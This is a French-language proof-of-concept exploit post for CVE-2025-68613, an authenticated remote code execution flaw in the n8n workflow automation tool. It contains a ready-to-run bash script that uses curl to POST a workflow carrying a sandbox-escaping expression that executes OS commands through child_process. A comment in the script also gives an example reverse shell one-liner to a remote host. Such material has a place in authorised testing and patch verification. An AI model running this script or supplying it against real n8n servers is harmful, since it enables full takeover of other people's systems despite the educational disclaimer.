
Exploit de preuve de concept pour CVE-2025-68613 : exécution de code à distance authentifiée dans n8n via injection d'expression
Exécution de code à distance critique (CVSS 9.9) dans l'outil d'automatisation de workflows n8n
Preuve de concept – Réservé à des fins éducatives et à la recherche de sécurité autorisée uniquement
Ce code est fourni STRICTEMENT à des fins éducatives et pour des tests de sécurité autorisés dans des environnements de laboratoire contrôlés.
Toute utilisation non autorisée sur des systèmes de production ou tout système sans autorisation écrite explicite est illégale et viole les lois sur les abus informatiques et la cybersécurité dans la plupart des juridictions.
Utilisation à vos risques et périls. L'auteur n'est pas responsable de toute mauvaise utilisation.
| Champ | Détails |
|---|---|
| Titre de l'exploit | n8n - Exécution de code à distance par injection d'expression authentifiée |
| CVE | CVE-2025-68613 |
| Date de divulgation | 2025-12-25 |
| Auteur | Mohammed Idrees Banyamer |
| Pays de l'auteur | Jordanie |
| Contact / Réseaux sociaux | Instagram : @banyamer_security |
| GitHub | mbanyamer |
| Fournisseur | n8n.io |
| Dépôt du logiciel | github.com/n8n-io/n8n |
| Versions vulnérables | ≥ 0.211.0 < 1.120.4 |
| Versions corrigées | 1.120.4, 1.121.1, 1.122.0 et versions ultérieures |
| Testé sur | n8n 1.119.3 (Docker) |
| Type de vulnérabilité | Exécution de code à distance authentifiée via contournement du bac à sable d'expressions |
| Score CVSS | 9.9 (Critique) |
Cette vulnérabilité permet à un utilisateur authentifié de créer ou de modifier des workflows à l'aide d'expressions malveillantes qui contournent le bac à sable d'expressions de n8n, entraînant l'exécution complète de commandes du système d'exploitation avec les privilèges du processus n8n.
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613
TARGET="http://localhost:5678" # ← Change to your target
API_KEY="your_n8n_api_key_here" # ← Insert valid API Key (or use Basic Auth / session)
CMD="id" # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"
echo "[*] Sending malicious workflow to ${TARGET}"
curl -s -X POST "${TARGET}/rest/workflows" \
-H "Content-Type: application/json" \
-H "X-N8N-API-KEY: ${API_KEY}" \
-d '{
"name": "CVE-2025-68613 PoC",
"active": false,
"nodes": [
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "'${PAYLOAD}'"
}
]
}
},
"name": "Exploit",
"type": "n8n-nodes-base.set",
"typeVersion": 1,
"position": [460, 300]
}
],
"connections": {}
}'
echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"